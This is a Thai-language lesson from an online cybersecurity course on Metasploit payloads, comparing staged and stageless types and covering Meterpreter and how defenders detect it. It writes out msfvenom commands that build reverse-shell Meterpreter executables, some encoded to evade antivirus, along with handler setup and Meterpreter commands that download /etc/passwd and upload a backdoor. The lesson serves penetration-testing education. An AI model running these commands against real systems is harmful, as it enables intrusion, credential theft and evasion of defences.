Cyber Security Academy · บทเรียน

เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter

เลือกเพย์โหลดที่เหมาะสมกับสถานการณ์ และใช้ Meterpreter หลังการเจาะระบบ

บทเรียน 3 จาก 413 ขั้นตอน

เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

เพย์โหลดคืออะไร

เพย์โหลดคือโค้ดที่ทำงานบนเป้าหมายหลังการใช้ประโยชน์จากช่องโหว่สำเร็จ เพย์โหลดกำหนดสิ่งที่ผู้โจมตีจะได้รับ ได้แก่ เชลล์ การเรียกใช้คำสั่ง การเข้าถึงไฟล์ หรือเอเจนต์ที่มีความสามารถครบถ้วนอย่าง Meterpreter

เพย์โหลดแบบแบ่งขั้นกับแบบไร้ขั้น

เพย์โหลดแบบ ไร้ขั้น (/) มีทุกอย่างอยู่ในไบนารีเดียว — มีขนาดใหญ่กว่าแต่เรียบง่ายกว่า และไม่ต้องมีการเรียกกลับผ่านเครือข่ายหลังการส่งครั้งแรก เพย์โหลดแบบ แบ่งขั้น (//) จะส่งตัวเริ่มต้นขนาดเล็กก่อน จากนั้นจึงดาวน์โหลดขั้นที่สองจากตัวจัดการ

# Stageless (single slash naming):
windows/x64/shell_reverse_tcp

# Staged (double slash naming):
windows/x64/shell/reverse_tcp
#                 ^
#                 stage 2 downloaded after stager connects

ควรใช้แต่ละแบบเมื่อใด

ใช้เพย์โหลดแบบ ไร้ขั้น เมื่อเป้าหมายไม่สามารถเข้าถึงอินเทอร์เน็ตหรือตัวจัดการหลังการโจมตีครั้งแรกได้ — เพย์โหลดต้องมีทุกอย่างในตัว ใช้เพย์โหลดแบบ แบ่งขั้น เมื่อต้องการเพย์โหลดเริ่มต้นที่มีขนาดเล็กกว่าและมีการเชื่อมต่อไปยังตัวจัดการที่เชื่อถือได้

ภาพรวมของ Meterpreter

Meterpreter คือเพย์โหลดขั้นสูงของ Metasploit ซึ่งทำงานทั้งหมดในหน่วยความจำ สื่อสารแบบเข้ารหัส และมี API ที่ครบความสามารถ ได้แก่ การเข้าถึงระบบไฟล์ การย้ายกระบวนการ การบันทึกการกดแป้นพิมพ์ การจับภาพหน้าจอ และการใช้เครื่องที่ถูกเจาะเป็นทางผ่าน

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > run

คำสั่งของ Meterpreter

คำสั่ง Meterpreter ที่จำเป็นสำหรับการทำงานหลังการใช้ประโยชน์จากช่องโหว่ ได้แก่ ข้อมูลระบบ รายการกระบวนการ การดำเนินการกับไฟล์ และเครือข่าย

meterpreter > sysinfo          # system information
meterpreter > getuid           # current user
meterpreter > ps               # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell            # drop to OS shell

การย้ายกระบวนการ

ย้ายกระบวนการ Meterpreter ไปยังกระบวนการที่เสถียรกว่าหรือดูน่าสงสัยน้อยกว่า (เช่น explorer.exe บน Windows) การทำเช่นนี้อาจช่วยยกระดับสิทธิ์ได้ด้วย หากย้ายไปยังกระบวนการที่มีสิทธิ์สูงกว่า

meterpreter > ps
meterpreter > migrate 1234     # migrate to PID 1234

# Migrate to explorer.exe for stability
# Avoids termination if original process exits

การสร้างเพย์โหลดด้วย msfvenom

msfvenom สร้างไฟล์เพย์โหลดแบบทำงานได้ในตัว (EXE, ELF, APK, เชลล์โค้ด) เพื่อส่งผ่านฟิชชิง การทิ้ง USB หรือเว็บเชลล์ในการทดสอบที่ได้รับอนุญาต

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f exe -o payload.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f elf -o payload.elf

Multi/Handler สำหรับรับเชลล์

โมดูลเสริม multi/handler จะรับการเชื่อมต่อเชลล์ย้อนกลับ กำหนดค่าให้ใช้เพย์โหลด LHOST และ LPORT เดียวกับที่ใช้ใน msfvenom ก่อนส่งเพย์โหลด

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j      # run as background job

พื้นฐานการเข้ารหัสและการหลบเลี่ยง

ตัวเข้ารหัสของ msfvenom สามารถทำให้เพย์โหลดคลุมเครือเพื่อหลบเลี่ยงการตรวจจับของ AV ที่อาศัยลายเซ็นพื้นฐาน หมายเหตุ: EDR สมัยใหม่ใช้การตรวจจับตามพฤติกรรม ดังนั้นการใช้ตัวเข้ารหัสเพียงอย่างเดียวจึงไม่เพียงพอต่อการป้องกันขั้นสูง

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -e x64/xor_dynamic -i 5 \
  -f exe -o encoded_payload.exe

เพย์โหลดแบบเชื่อมย้อนกลับกับแบบรอรับการเชื่อมต่อ

เพย์โหลดแบบเชื่อมย้อนกลับจะเชื่อมต่อจากเป้าหมายไปยังผู้โจมตี (เหมาะกว่าสำหรับ NAT/ไฟร์วอลล์) ส่วนเพย์โหลดแบบรอรับการเชื่อมต่อจะรับฟังอยู่บนเป้าหมาย — ผู้โจมตีเป็นฝ่ายเชื่อมต่อเข้าไป โดยทั่วไปมักเลือกใช้แบบเชื่อมย้อนกลับ

การตรวจจับเพย์โหลดโดยผู้ป้องกันระบบ

ผู้ป้องกันระบบตรวจจับ Meterpreter ได้จากลายเซ็นเครือข่าย (รูปแบบการรับส่งข้อมูล C2) การสแกนหน่วยความจำ (ร่องรอยการแทรก DLL แบบสะท้อนกลับ) และการวิเคราะห์พฤติกรรม (การทำให้กระบวนการกลวง ความสัมพันธ์ระหว่างกระบวนการแม่กับกระบวนการลูกที่ผิดปกติ)

ตรวจสอบอย่างรวดเร็ว

อะไรคือความแตกต่างระหว่างเพย์โหลดแบบแบ่งขั้นกับเพย์โหลดแบบไร้ขั้นใน Metasploit

สรุป: เพย์โหลดและ Meterpreter

เลือกเพย์โหลดแบบแบ่งขั้นเมื่อต้องการลดขนาดเริ่มต้น และเลือกแบบไร้ขั้นเมื่อต้องการการส่งที่มีทุกอย่างในตัว Meterpreter คือเพย์โหลดที่มีความสามารถสูงสุดสำหรับการทำงานหลังการใช้ประโยชน์จากช่องโหว่ โดยทำงานในหน่วยความจำ เข้ารหัส และขยายความสามารถได้ ใช้ msfvenom เพื่อสร้างไบนารีแบบทำงานได้ในตัว และกำหนดค่า multi/handler เพื่อรับการเรียกกลับเสมอ

เริ่มต้นได้ฟรี

เรียนรู้ Cyber Security Academy ด้วย AI tutor — ฟรี

เขียนและเรียกใช้โค้ดจริงในเบราว์เซอร์ของคุณ รับความช่วยเหลือทันทีจาก AI tutor 24/7 และเรียนรู้ต่อจากที่คุณหยุดบนเว็บหรือในแอป

คอร์ส
76
บทเรียน
303

คำถามที่พบบ่อย

บทเรียน “เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter”

เลือกเพย์โหลดที่เหมาะสมกับสถานการณ์ และใช้ Meterpreter หลังการเจาะระบบ คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน

บทเรียน “เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม

ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. สถาปัตยกรรม Metasploit และ msfconsole
  2. การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว
  3. เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter
  4. หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่
← กลับไปที่ Cyber Security Academy